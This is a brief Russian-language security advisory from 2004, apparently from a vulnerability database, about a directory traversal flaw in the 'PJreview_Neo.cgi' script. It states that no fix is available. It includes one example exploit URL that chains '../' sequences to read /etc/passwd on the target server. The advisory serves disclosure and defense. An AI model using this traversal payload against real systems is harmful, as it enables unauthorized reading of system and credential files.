Просмотр произвольных файлов на целевой системе в 'PJreview_Neo.cgi' сценарии

Дата публикации:
01.02.2004
Всего просмотров:
803
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PJreview_Neo.cgi

Описание: Уязвимость обнаружена в 'PJreview_Neo.cgi' сценарии. Удаленный пользователь может просматривать файлы на целевой системе.

Пример/Эксплоит:

http://address/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../.. /etc/passwd

URL производителя:http://www.livepj.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard review)

или введите имя

CAPTCHA